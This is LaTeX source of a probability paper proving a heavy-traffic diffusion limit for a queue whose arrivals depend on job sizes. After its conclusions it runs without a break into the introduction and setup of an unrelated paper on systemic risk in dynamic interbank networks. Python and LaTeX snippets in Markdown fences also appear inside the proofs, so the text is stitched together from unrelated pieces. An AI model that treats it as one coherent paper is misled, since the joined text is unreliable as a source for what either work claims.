&\leq n^{2/3} t \E_{\sss S}[S_{c(1)}^2 \mathds 1_{\{S_{c(1)}> \varepsilon n^{1/3}\}}](1 + o_{\PS}(1)),
\end{align}%
where we used Lemma \ref{lem:expectation_service_times_ordering} with $f(x) = x^2\mathds 1_{\{x>\varepsilon n^{1/3}\}}$.
Computing the expectation explicitly we get
\begin{align}%
t \E_{\sss S}[S_{c(1)}^2 \mathds 1_{\{S_{c(1)}> \varepsilon n^{1/3}\}}] &= t \sum_{i\in[n]}S_i^2 \mathds 1_{\{S_{i}> \varepsilon n^{1/3}\}} \mathbb{P}( c(1) = i) \notag\\
&= t \sum_{i\in[n]}S_i^2 \mathds 1_{\{S_{i}> \varepsilon n^{1/3}\}}\frac{S_i^{\alpha}}{\sum_{j\in[n]} S_j^{\alpha}},
\end{align}%
so that $n^{-2/3}$ times the left-hand side of \eqref{eq:first_way_beginning} is bounded by
\begin{align}%
\frac{t(1+o_{\PS}(1))}{\sum_{j\in[n]} S_j^{\alpha}} \sum_{i\in[n]} S_i^{2+\alpha}\mathds 1_{\{S_{i}> \varepsilon n^{1/3}\}} + \varepsilon^2.
\end{align}%
The first term tends to zero as $n\rightarrow\infty$ since $\mathbb E[S^{2+\alpha}] < \infty$, and since $\varepsilon>0$ is arbitrary the claim follows.
\end{proof}
By Lemma \ref{lem:exp_sup_S_squared_oP_n_two_thirds} the right-hand side of \eqref{eq:proof_of_iii_final_bound_U} converges to zero, and this concludes the proof.
\qed
\subsubsection{Proof of \ref{size_biased:eq:fourth_condition_martingale_FCLT} for the upper bound}\label{sec:martingale_jumps_bounding_process_converges_to_zero}
First we split
\begin{align}%
\E_{\sss S}[\sup_{k\leq tn^{2/3}}(M_n^{\scriptscriptstyle U}(k) - M_n^{\scriptscriptstyle U}(k-1))^2] &= \E_{\sss S}[\sup_{k\leq tn^{2/3}}(A_n^{\scriptscriptstyle U}(k) - \E_{\sss S}[A_n^{\scriptscriptstyle U}(k) \mid \mathcal F_{k-1}])^2]\notag\\
&\leq 2\E_{\sss S}[ \sup_{k\leq tn^{2/3}}\vert A_n^{\scriptscriptstyle U}(k)\vert^2] + 2\E_{\sss S}[\sup_{k\leq tn^{2/3}}\E_{\sss S}[A_n^{\scriptscriptstyle U}(k) \mid \mathcal F_{k-1}]^2]\notag\\
&\leq 4\E_{\sss S} [ \sup_{k\leq tn^{2/3}}\vert A_n^{\scriptscriptstyle U}(k)\vert^2].
\end{align}%
We then stochastically dominate $(A_n^{\scriptscriptstyle U}(k))_{k\leq tn^{2/3}}$ by a sequence of Poisson processes $(\Pi_k)_{k\leq tn^{2/3}}$, according to
\begin{equation}\label{eq:expectation_sup_A_squared_start}%
A_n^{\scriptscriptstyle U}(k) \preceq \Pi_k\Big(c_{n,\beta} S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)=:A'_n(k).
\end{equation}%
Indeed, if $E_1, E_2,\ldots, E_n$ are exponential random variables with parameters $\lambda_1, \lambda_2, \ldots, \lambda_n$, there exists a coupling with a Poisson process $\Pi(\cdot)$ such that $\sum_{i\leq n} \mathds 1_{\{E_i\leq t\}} \leq \Pi(\sum_{i\leq n}\lambda_i t)$. The coupling is constructed as follows. Each random variable $E_i$ is coupled with a Poisson process $\Pi^{(i)}$ with intensity $\lambda_i$ in such a way that $\mathds 1_{\{E_i\leq t\}} \leq \Pi^{(i)} (\lambda_i t)$. Moreover, by basic properties of the Poisson process $\sum_{i\leq n} \Pi^{(i)}(\lambda_i t) \stackrel{\mathrm d}{=} \Pi(\sum_{i\leq n} \lambda_i t)$.
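A minimal simulation of this coupling, under the assumption that each $E_i$ is realized as the first arrival of its rate-$\lambda_i$ Poisson process $\Pi^{(i)}$: the domination $\sum_{i}\mathds 1_{\{E_i\leq t\}}\leq \Pi(\sum_i \lambda_i t)$ then holds on every sample path, with $\Pi$ the superposition of the $\Pi^{(i)}$. The rates and horizon below are illustrative.

```python
import random

random.seed(3)

lambdas = [0.3, 1.2, 0.7, 2.0]   # illustrative rates lambda_1, ..., lambda_n
t = 1.5                          # illustrative horizon

def poisson_arrivals(rate, horizon):
    """Arrival times of a Poisson process with the given rate on [0, horizon]."""
    times, s = [], 0.0
    while True:
        s += random.expovariate(rate)
        if s > horizon:
            return times
        times.append(s)

for _ in range(1000):
    indicators, total_counts = 0, 0
    for lam_i in lambdas:
        arr = poisson_arrivals(lam_i, t)
        E_i = arr[0] if arr else float("inf")   # first arrival ~ Exp(lam_i)
        indicators += 1 if E_i <= t else 0      # at most one count per E_i
        total_counts += len(arr)                # Pi^{(i)} counts on [0, t]
    # Superposition of the Pi^{(i)} is Poisson with rate sum(lambdas), and
    # each indicator is dominated by the corresponding arrival count.
    assert indicators <= total_counts
```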
We bound \eqref{eq:expectation_sup_A_squared_start} via martingale techniques. First, we decompose it as
\begin{align}\label{eq:expectation_sup_A_squared_martingale_decomposition}%
n^{-2/3}\E_{\sss S} [ \sup_{k\leq tn^{2/3}}\vert A^{\scriptscriptstyle U}_n(k)\vert^2] \leq &2n^{-2/3}\E_{\sss S} \Big[\Big(\sup_{k\leq tn^{2/3}} \Big\vert A'_n(k) - c_{n,\beta}S_{c(k)}\sum_{i\in[n]}\frac{S_i^{\alpha}}{n}\Big\vert\Big)^2\Big] \notag\\
&+ 2n^{-2/3}\E_{\sss S} \Big[\Big(c_{n,\beta}\sup_{k\leq tn^{2/3}} S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)^2\Big].
\end{align}%
Applying Doob's $L^2$ martingale inequality \cite[Theorem 11.2]{klenke2008probability} to the first term we see that it converges to zero, since
\begin{align}%
n^{-2/3}\E_{\sss S} \Big[\Big(\sup_{k\leq tn^{2/3}}\Big\vert A'_n(k) - c_{n,\beta}S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big\vert\Big)^2\Big] &\leq 4n^{-2/3}\E_{\sss S}\Big[\Big\vert A'_n(tn^{2/3}) - c_{n,\beta}S_{c(tn^{2/3})}\sum_{i\in[n]}\frac{S_i^{\alpha}}{n}\Big\vert^2\Big]\notag\\
&= 4n^{-2/3} \E_{\sss S} \Big[c_{n,\beta}S_{c(tn^{2/3})}\sum_{i\in[n]}\frac{S_i^{\alpha}}{n}\Big].
\end{align}%
The last equality follows from the expression for the variance of a Poisson random variable. The right-most term converges to zero by Lemma \ref{lem:1+alphaConditionalMoment}. We now bound the second term in \eqref{eq:expectation_sup_A_squared_martingale_decomposition}, as
\begin{align}\label{eq:expectation_sup_A_squared_martingale_drift_estimate}%
n^{-2/3}\E_{\sss S} \Big[\Big(c_{n,\beta}\sup_{k\leq tn^{2/3}} S_{c(k)}\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)^2\Big] &= c_{n,\beta}^2 n^{-2/3}\Big(\sum_{i\in[n]} \frac{S_i^{\alpha}}{n}\Big)^2 \E_{\sss S} [(\sup_{k\leq tn^{2/3}}S_{c(k)})^2].
\end{align}%
By Lemma \ref{lem:exp_sup_S_squared_oP_n_two_thirds} the right-hand side of \eqref{eq:expectation_sup_A_squared_martingale_drift_estimate} converges to zero, concluding the proof of \ref{size_biased:eq:fourth_condition_martingale_FCLT}.
\qed
\subsection{Convergence of the scaling limit}
As a consequence of \eqref{eq:reflected_process_domination} and Theorem \ref{MainTheorem_U} we have that $Q_n(k) = O_{\mathbb P}(n^{1/3})$ for $k = O(n^{2/3})$. In fact, $n^{-1/3}Q_n(k)$ is tight when $k=O(n^{2/3})$, as the following lemma shows:
\begin{lemma}\label{lem:sup_Q_converges_to_zero}%
Fix $\bar t>0$. The sequence $n^{-1/3}\sup_{t\leq \bar t} Q_n(t n^{2/3})$ is tight.
\end{lemma}%
\begin{proof}
The supremum function $f\mapsto \sup_{t\leq \bar t}f(t)$ is continuous on $(\mathcal D, J_1)$ by \cite[Theorem 13.4.1]{StochasticProcess}. In particular, by Theorem \ref{MainTheorem_U} and the continuous mapping theorem,
\begin{equation}%
n^{-1/3}\sup_{t\leq \bar t} Q_n^{\scriptscriptstyle U}(t n^{2/3})\sr{\mathrm d}{\rightarrow}\sup_{t\leq \bar t} \phi(W)(t).
\end{equation}%
Since $Q_n(k) \leq Q_n^{\scriptscriptstyle U}(k)$, the conclusion follows.
\end{proof}%
As an immediate consequence of \eqref{eq:cardinality_nu} and Lemma \ref{lem:sup_Q_converges_to_zero}, we have the following important corollary. Recall that $\nu_i$ is the set of customers who have left the system or are in the queue at the beginning of the $i$-th service, so that $\vert \nu_i\vert = i + Q_n(i)$. Recall also that $0\leq Q_n(t) \leq Q_n^{\scriptscriptstyle U}(t)$.
\begin{corollary}\label{cor:nr_joined_customer_at_time_n_twothirds_is_n_twothirds}
As $n\rightarrow\infty$,
\begin{equation}%
\vert \nu_i \vert = i + o_{\mathbb P} (i), \qquad \mathrm{uniformly~in}~i= O_{\mathbb P} (n^{2/3}).
\end{equation}%
\end{corollary}
Intuitively, this implies that the main contribution to the downwards drift in the queue-length process comes from the customers that have left the system, and not from the customers in the queue. Equivalently, the order of magnitude of the queue length, namely $n^{1/3}$, is negligible with respect to the order of magnitude of the number of customers who have left the system, which is $n^{2/3}$.
In order to prove Theorem \ref{th:main_theorem_delta_G_1} we proceed as in the proof of Theorem \ref{MainTheorem_U}, but we now need to deal with the more complicated drift term. As before, we decompose $N_n(k) = M_n(k) + C_n(k)$, where
\begin{align}%
M_n(k) & = \sum_{i=1}^k (A_n(i) - \E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}]),\notag\\
C_n(k) &= \sum_{i=1}^k (\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] -1),\notag\\
B_n(k) &= \sum_{i=1}^k (\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}]^2).
\end{align}%
As before, we separately prove the convergence of the drift $C_n(k)$ and of the martingale $M_n(k)$, by verifying the conditions \ref{size_biased:eq:first_condition_martingale_FCLT}-\ref{size_biased:eq:fourth_condition_martingale_FCLT} in Section \ref{sec:proof_thm_U}.
Verifying \ref{size_biased:eq:first_condition_martingale_FCLT} proves to be the most challenging task, while the estimates for \ref{size_biased:eq:second_condition_martingale_FCLT}-\ref{size_biased:eq:fourth_condition_martingale_FCLT} in Section \ref{sec:proof_thm_U} carry over without further complications.
\subsubsection{Proof of \ref{size_biased:eq:first_condition_martingale_FCLT} for the embedded queue}
By expanding $\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] -1$ as in \eqref{eq:ConditionedArrivalsFirst_U}, we get
\begin{align}\label{eq:ConditionedArrivalsFirst}%
\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] -1&= \Big(c_{n,\beta}\lambda\frac{\sum_{l=1}^n S_l^{\alpha}}{n}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]-1\Big) - c_{n,\beta}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]\sum_{l\in\nu_{i}\setminus \{c(i)\}}\lambda\frac{S_l^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\frac{\lambda}{n}\E_{\sss S}[S_{c(i)}^{1+\alpha} \mid \mathcal F_{i-1}]+ o_{\mathbb P}(n^{-1/3}).
\end{align}%
By further expanding the first term in \eqref{eq:ConditionedArrivalsFirst} as in \eqref{eq:ConditionedArrivalsFirstTerm}, we get
\begin{align}\label{eq:conditioned_arrivals_middle_computation}%
\E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}] - 1 &= \Big(c_{n,\beta} \frac{\lambda}{n}\sum_{j\notin\served{i-1}}S_j^{1+\alpha}-1\Big) - c_{n,\beta}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \lambda \frac{S_{c(l)}^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\frac{\lambda}{n}\E_{\sss S}[S_{c(i)}^{1+\alpha} \mid \mathcal F_{i-1}] + o_{\mathbb P}(n^{-1/3}),
\end{align}%
where we have used \eqref{eq:cardinality_nu}. Comparing equation \eqref{eq:conditioned_arrivals_middle_computation} with equation \eqref{eq:conditioned_arrivals_final_expression}, we rewrite the drift as
\begin{equation}%
C_n(k) = C_n^{\scriptscriptstyle U}(k) - c_{n,\beta}\lambda\sum_{i=1}^{k}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n}.
\end{equation}%
Therefore, to conclude the proof of \ref{size_biased:eq:first_condition_martingale_FCLT} it is enough to show that the second term vanishes, after rescaling. We do this in the following lemma:
\begin{lemma}\label{lem:difficult_drift_term_converges_to_zero}
As $n\rightarrow\infty$,
\begin{equation}%
n^{-1/3}c_{n,\beta}\lambda\sum_{i=1}^{\bar t n^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n} \sr{\mathbb P}{\rightarrow} 0.
\end{equation}%
\end{lemma}
\begin{proof}%
By Lemma \ref{lem:sup_Q_converges_to_zero}, $\sup_{i\leq \bar t n^{2/3}}Q_n(i)\leq C_1 n^{1/3}$ w.h.p.~for a large constant $C_1$, and by Lemma \ref{lem:1+alphaConditionalMoment}, $\sup_{i\leq \bar tn^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]\leq C_2$ w.h.p.~for another large constant $C_2$. This implies that, w.h.p.,
\begin{equation}%
n^{-1/3}c_{n,\beta}\lambda\sum_{i=1}^{\bar t n^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n} \leq c_{n,\beta}\lambda C_2 \sum_{i=1}^{\bar t n^{2/3}}\sum_{l=i+1}^{i+1+C_1n^{1/3}}\frac{S_{c(l)}^{\alpha}}{n^{4/3}}.
\end{equation}%
The double sum can be rewritten as
\begin{align}%
c_{n,\beta}\lambda C_2 \sum_{i=1}^{\bar t n^{2/3}}\sum_{l=i+1}^{i+1+C_1n^{1/3}}\frac{S_{c(l)}^{\alpha}}{n^{4/3}} &\leq c_{n,\beta}\lambda C_2 \sum_{j=1}^{\bar tn^{2/3}+C_1n^{1/3}}\min\{j, C_1 n^{1/3}\}\frac{S^{\alpha}_{c(j)}}{n^{4/3}}\notag\\
&\leq c_{n,\beta}\lambda C_1 C_2 \sum_{j=1}^{(\bar t+C_1)n^{2/3}} \frac{S^{\alpha}_{c(j)}}{n}.
\end{align}%
The right-most term converges to zero in probability as $n\rightarrow\infty$ by Lemma \ref{lem:size_biased_service_times_unif_convergence}. This concludes the proof.
\end{proof}%
Since
\begin{equation}%
n^{-1/3}C_n(tn^{2/3}) = n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3}) - n^{-1/3}c_{n,\beta}\lambda\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}] \sum_{l=i+1}^{i+1+Q_n(i-1)} \frac{S_{c(l)}^{\alpha}}{n},
\end{equation}%
Lemma \ref{lem:difficult_drift_term_converges_to_zero} and the convergence result \eqref{eq:drift_rescaled_final_expression} for $ n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3})$ conclude the proof of \ref{size_biased:eq:first_condition_martingale_FCLT}.
\qed
\subsubsection{Proof of \ref{size_biased:eq:second_condition_martingale_FCLT}, \ref{size_biased:eq:third_condition_martingale_FCLT} and \ref{size_biased:eq:fourth_condition_martingale_FCLT} for the embedded queue}
Proceeding as before, we find that
\begin{align}\label{eq:quadratic_variation_zeroth}%
B_n(k) &= \sum_{i=1}^k(\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n(i) \mid \mathcal F_{i-1}]^2) \notag\\
&= \sum_{i=1}^k(\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] - 1) + O_{\mathbb P}(kn^{-1/3}),
\end{align}%
where
\begin{equation}\label{eq:quadratic_variation_first}%
\E_{\sss S}[A_n(i)^2 \mid \mathcal F_{i-1}] = \E_{\sss S}[A_n(i)\mid \mathcal F_{i-1}] + \E_{\sss S}\Big[\sum_{\substack{h,q\notin \nu_{i-1}\\h\neq q}}\mathds{1}_{\{T_{h}\leq S_{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}\Big].
\end{equation}%
Similarly as in Section \ref{sec:quadratic_variation_of_upper_bounding_process_converges_to_zero}, we get
\begin{align}\label{eq:BComputations}%
\sum_{\substack{h,q\notin \nu_{i-1}\\h\neq q}}&\E_{\sss S}[\mathds{1}_{\{T_{h}\leq S_{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}] \\
&= \E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\frac{\lambda ^2}{n^{2}}\Big(\sum_{h=1}^nS_h^{\alpha}\Big)^2 - \E_{\sss S}\Big[S_{c(i)}^2\frac{\lambda ^2}{n^{2}}\sum_{\substack{h,q\in \nu_{i-1}\cup \{c(i)\}\\ \cup \{h = q\}}}S_h^{\alpha}S_q^{\alpha} \mid \mathcal F_{i-1}\Big] + o_{\mathbb P}(1)\notag.
\end{align}%
The second term is an error term by Lemma \ref{lem:unif_convergence_random_sums} and Corollary \ref{cor:nr_joined_customer_at_time_n_twothirds_is_n_twothirds}. This implies that $B_n(\cdot)$ can be rewritten as
\begin{equation}%
B_n(k) = \Big(\frac{\lambda}{n}\sum_{h=1}^nS_h^{\alpha}\Big)^2\sum_{i=1}^k \E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}] + o_{\mathbb P}(k),
\end{equation}%
so that
\begin{equation}%
n^{-2/3}B_n(n^{2/3}u) \stackrel{\mathbb P}{\rightarrow} \lambda^2\mathbb E[S^{\alpha}]\mathbb E [S^{2+\alpha}]u,
\end{equation}%
which concludes the proof of \ref{size_biased:eq:second_condition_martingale_FCLT}.
\qed
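For the reader's convenience, we sketch where the constant comes from; this is a heuristic check, not part of the formal argument. Since the first $O(n^{2/3})$ customers to join are approximately $\alpha$-size-biased (cf.\ Lemma \ref{lem:size_biased_distribution}), $\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}] \approx \mathbb E[S^{2+\alpha}]/\mathbb E[S^{\alpha}]$, while $\frac{\lambda}{n}\sum_{h=1}^n S_h^{\alpha} \to \lambda\mathbb E[S^{\alpha}]$ by the law of large numbers, so that

```latex
\begin{equation*}
n^{-2/3}B_n(n^{2/3}u) \approx \big(\lambda\,\mathbb E[S^{\alpha}]\big)^2\,\frac{\mathbb E[S^{2+\alpha}]}{\mathbb E[S^{\alpha}]}\,u = \lambda^2\,\mathbb E[S^{\alpha}]\,\mathbb E[S^{2+\alpha}]\,u.
\end{equation*}
```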
To conclude the proof of Theorem \ref{th:main_theorem_delta_G_1}, we are left to verify \ref{size_biased:eq:third_condition_martingale_FCLT} and \ref{size_biased:eq:fourth_condition_martingale_FCLT}. However, the estimates in Sections \ref{sec:quadratic_variation_jumps_bounding_process_converges_to_zero} and \ref{sec:martingale_jumps_bounding_process_converges_to_zero} also hold for $B_n(\cdot)$ and $M_n(\cdot)$, since they rely respectively on \eqref{eq:proof_of_iii_final_bound_U} and \eqref{eq:expectation_sup_A_squared_start} to bound the lower-order contributions to the drift. This concludes the proof of Theorem \ref{th:main_theorem_delta_G_1}.
\qed
\section{Conclusions and discussion}\label{sec:conclusion}
In this paper we have considered a generalization of the $\smash{\Delta_{(i)}/G/1}$ queue, which we call the $\DGa$ queue, a model for the dynamics of a queueing system in which only a finite number of customers can join. In our model, the arrival time of a customer depends on its service requirement through a parameter $\alpha\in[0,1]$. We have proved that, under a suitable heavy-traffic assumption, the diffusion-scaled queue-length process embedded at service completions converges to a stochastic process $W(\cdot)$.
A distinctive characteristic of our results is the so-called \emph{depletion-of-points effect}, represented by a quadratic drift in $W(\cdot)$. A (directed) tree is associated to the $\DGa$ queue in a natural way, and the heavy-traffic assumption corresponds to \emph{criticality} of the associated random tree.
Our result interpolates between two already known results. For $\alpha = 0$ the arrival clocks are i.i.d.~and the analysis simplifies significantly. In this context, \cite{bet2014heavy} proves an analogous heavy-traffic diffusion approximation result. Theorem \ref{th:main_theorem_delta_G_1} can then be seen as a generalization of \cite[Theorem 5]{bet2014heavy}. If $\alpha = 1$, the $\DGa$ queue has a natural interpretation as an exploration process of an inhomogeneous random graph. In this context, \cite{bhamidi2010scaling} proves that the ordered component sizes converge to the excursion of a reflected Brownian motion with parabolic drift. Our result can then also be seen as a generalization of \cite{bhamidi2010scaling} to the \emph{directed} components of directed inhomogeneous random graphs.
Lemma \ref{lem:size_biased_distribution} implies that the distribution of the service time of the first $O(n^{2/3})$ customers to join the queue converges to the $\alpha$-\emph{size-biased} distribution of $S$, irrespective of the precise time at which the customers arrive. This suggests that it is possible to prove Theorem \ref{th:main_theorem_delta_G_1} by approximating the $\DGa$ queue via a $\smash{\Delta_{(i)}/G/1}$ queue with service time distribution $S^*$ such that
\begin{equation}%
\mathbb P(S^*\in \mathcal A) = \mathbb E[S^{\alpha}\mathds 1_{\{S\in\mathcal A\}}]/\mathbb E[S^{\alpha}],
\end{equation}%
and i.i.d.~arrival times distributed as $T_i\sim\exp (\lambda\mathbb E[S^{\alpha}])$. This conjecture is supported by two observations. First, the heavy-traffic conditions for the two queues coincide. Second, the standard deviation of the Brownian motion is the same in the two limiting diffusions. However, this approximation fails to capture the higher-order contributions to the queue-length process. As a result, the coefficients of the negative quadratic drift in the two queues are different, and thus the approximation of the $\DGa$ queue with a $\smash{\Delta_{(i)}/G/1}$ queue is insufficient to prove Theorem \ref{th:main_theorem_delta_G_1}.
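To illustrate this $\alpha$-size-biased law numerically, the following Python sketch computes it exactly for a discrete $S$ and approximates it by weighted resampling for a continuous $S$. The distributions and parameters (uniform on $\{1,2,3\}$, exponential, $\alpha \in \{1, 1/2\}$) are arbitrary choices for illustration and are not part of the model.

```python
import numpy as np

rng = np.random.default_rng(0)

def size_biased_pmf(values, probs, alpha):
    """alpha-size-biased law of a discrete S: P(S* = s) proportional to s**alpha * P(S = s)."""
    w = np.asarray(values, dtype=float) ** alpha * np.asarray(probs, dtype=float)
    return w / w.sum()

# exact computation for S uniform on {1, 2, 3} with alpha = 1
pstar = size_biased_pmf([1, 2, 3], [1/3, 1/3, 1/3], alpha=1.0)  # [1/6, 1/3, 1/2]

# weighted-resampling approximation for a continuous S (here exponential,
# an arbitrary choice) with alpha = 1/2: resample a Monte Carlo pool with
# weights proportional to S**alpha
pool = rng.exponential(scale=1.0, size=200_000)
w = pool ** 0.5
resampled = rng.choice(pool, size=200_000, p=w / w.sum())
# the resampled mean approximates E[S^{1+alpha}] / E[S^{alpha}]
```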
Surprisingly, the assumption that $\alpha$ lies in the interval $[0,1]$ plays no role in our proof. On the other hand, we see from \eqref{eq:main_theorem_delta_G_1_diffusion_definition} that
\begin{equation}\label{eq:moments_assumption_for_general_alpha}%
\max\{\mathbb E[S^{2+\alpha}],\mathbb E[S^{1+2\alpha}],\mathbb E[S^{\alpha}]\}<\infty
\end{equation}%
is a necessary condition for Theorem \ref{th:main_theorem_delta_G_1} to hold. From this we conclude that Theorem \ref{th:main_theorem_delta_G_1} remains true as long as $\alpha\in\mathbb R$ is such that \eqref{eq:moments_assumption_for_general_alpha} is satisfied. From the modelling point of view, $\alpha>1$ represents a situation in which customers with larger job sizes have a stronger incentive to join the queue. On the other hand, when $\alpha < 0$ the queue models a situation in which customers with large job sizes are lazy and thus favour joining the queue later. We remark that the \emph{form} of the limiting diffusion is the same for all $\alpha\in\mathbb R$, but different values of $\alpha$ yield different fluctuations (standard deviation of the Brownian motion), and a different quadratic drift.
\paragraph{Acknowledgments}
This work is supported by the NWO Gravitation {\sc Networks} grant 024.002.003. The work of RvdH is further supported by the NWO VICI grant 639.033.806. The work of GB and JvL is further supported by an NWO TOP-GO grant and by an ERC Starting Grant.
\bibliographystyle{abbrv}
\DeclareRobustCommand{\HOF}[3]{#3}
\section{Introduction}\label{sec:intro}
Systemic risk can cause outsized losses within the financial system due to feedback mechanisms such as direct default contagion, or, as we study in this paper, expectations of future defaults. The severity of this was evidenced by the excessive losses during the 2008 financial crisis. In this work we present a model for debt interlinkages in a dynamic financial system that allows us to study such contagious events, arising from the appropriate (equilibrium) pricing of the interbank obligations.
The network of interbank obligations, and the resulting default contagion, has been studied in the seminal works of~\cite{EN01,RV13,GK10} in deterministic one-period systems. These static systems have been extended in a number of directions and remains an active area of research; we refer the interested reader to~\cite{glasserman2016contagion,AW_15} for surveys of this literature. More recent extensions have been presented in, e.g., \cite{paddrik2020contagion} which studies the potential for contagion through margin requirements, \cite{klages2020cascading} which analyzes (re)insurance networks, and \cite{ghamami2022collateralized} which considers collateralization in interbank networks.
Within this work, we base much of our analysis on a system with fixed recovery of liabilities, i.e., in which institutions either make all debt payments in full or a fixed fraction of liabilities are returned. We extend this modeling framework to allow for system dynamics between the origination date and maturities of the obligations.
Dynamic default contagion extensions of the works of~\cite{EN01,RV13,GK10} have previously been studied in~\cite{CC15,ferrara16,KV16} in discrete-time settings and~\cite{BBF18,sonin2020continuous,feinstein2021dynamic} in continuous-time frameworks. All of these cited works, however, use (implicitly) a historical price accounting rule for marking interbank assets. That is, all interbank assets are either marked as if the payment will be made in full (prior to maturity or a default) or marked based on the realized payment (after debt maturity or the default event). This is in contrast to the mark-to-market accounting used for tradable assets where the value of interbank assets would depend on the expected payments (prior to maturity or a default).
Consequently, we want to study a dynamic default contagion model with forward-looking probabilities of default so as to mark interbank assets to a market within the balance sheet of all firms. This construction is a network valuation adjustment to the single-firm Black--Cox model (\cite{black1976valuing}) for pricing obligations in a network. We thus extend the prior literature on network valuation adjustments (e.g.,~\cite{CS07network, fischer2014,barucca2020network,banerjee2022pricing}) which consider obligations in systems with a single maturity and without the possibility for early declarations of default (i.e., default can only be declared at the maturity of the obligations). Such static systems are comparable to the single firm model of~\cite{merton1974} for pricing debt and equity. Herein we relax this assumption to allow for, e.g., safety covenants as in~\cite{black1976valuing,leland1994corporate} to permit for early declarations of bankruptcy.
As already emphasized, we introduce a dynamic network model with either a single or multiple maturity dates. In constructing and analyzing this systemic risk model, we make the following four primary innovations and contributions.
\begin{enumerate}
\item First, we construct a dynamic network model with a forward-looking marking of interbank assets based on their (risk-neutral) probabilities of default. This mark-to-market accounting of interbank assets is in contrast to prior works on dynamic networks which (implicitly or explicitly) consider historical price accounting, i.e., all debts are assumed to be paid in full until a default is realized (at which time a downward jump in equity occurs). Notably, by accounting for the possibility of future defaults, contagion can occur without a default having occurred but merely that one may happen in the future. With abuse of terminology, we find that default contagion can occur without any realized default.
\item Second, using these equilibrium default probabilities, we are able to construct a term structure for debts that includes the possibility of contagious events. As such, the proposed modeling framework naturally constructs a network valuation adjustment for the entire yield curve for every bank within the financial system.
\item Third, we study the mathematical properties of the clearing solutions of this dynamic network. Notably, though the system is presented as a fixed point problem at all times simultaneously, we present an equivalent formulation satisfying the dynamic programming principle which, in particular, allows us to prove that the (maximal) equilibrium solution in an extended state space satisfies the Markov property.
\item Fourth, as far as the authors are aware, this is the first dynamic interbank network model that directly considers the manner in which banks may rebalance their portfolio over time as asset prices fluctuate and defaults are realized. Specifically, we present simple rebalancing strategies as well as an optimal strategy that incorporates regulatory constraints.
\end{enumerate}
Throughout this work, we demonstrate the financial implications of this model with numerical case studies. In particular, we wish to highlight the nonlinear and non-monotonic behavior of the probability of default with respect to the correlations between bank assets (see Section~\ref{sec:1maturity-cs-corr} and Figure~\ref{fig:corr}). Furthermore, holding everything else fixed, we find that the shape of the yield curve for one firm can depend on the riskiness of other banks in the system; specifically, if the volatility of core institutions grow, the yield curve for all institutions can transform from a normal to inverted shape (see Section~\ref{sec:Kmaturity-cs-cp} and Figure~\ref{fig:cp}).
The remainder of this paper is as follows.
In Section~\ref{sec:setting}, background information is provided. Specifically, in Section~\ref{sec:setting-network}, the static version of our interbank system is presented so as to illuminate notation and the general structure considered for the dynamic models presented later. The tree-based probability spaces used throughout this work are presented in Section~\ref{sec:setting-tree}.
In Section~\ref{sec:1maturity}, a dynamic system is constructed in which all obligations (interbank and external) are due at the same \emph{future} maturity. In constructing this system, the value of interbank assets is weighted by the (risk-neutral) probability of the payment being made in full, i.e., the risk-neutral expectation of the asset value at maturity. Existence of maximal and minimal clearing solutions is presented along with properties of these extremal solutions.
In Section~\ref{sec:Kmaturity}, this system is extended to permit multiple maturity dates for obligations. In doing so, defaults can occur due to either \emph{insolvency} or \emph{illiquidity}. As with the single maturity setting, the existence of clearing solutions and their properties are presented. Within this construction, the composition of assets and the manner in which banks rebalance their portfolios are directly considered.
Finally, in Section~\ref{sec:conclusion}, we provide some simple policy implications of our model as well as directions for future research.
\section{Setting}\label{sec:setting}
\subsection{Interbank networks}\label{sec:setting-network}
Within this work we will consider a \emph{dynamic} financial system akin to the static model of \cite{GK10} for default contagion. To briefly provide the financial context and some basic notation, we will summarize the static setting which we will extend in the subsequent sections.
Consider a financial system comprised of $n$ banks or other financial institutions labeled $1,2,...,n$. The balance sheet of each bank is made up of both interbank and external assets and liabilities.
Specifically, on the asset side of the balance sheet, bank $i$ holds external assets $x_i \geq 0$ and interbank assets $L_{ji} \geq 0$ for each potential counterparty $j = 1,2,...,n$ (with $L_{ii} = 0$ so as to avoid self-dealing).
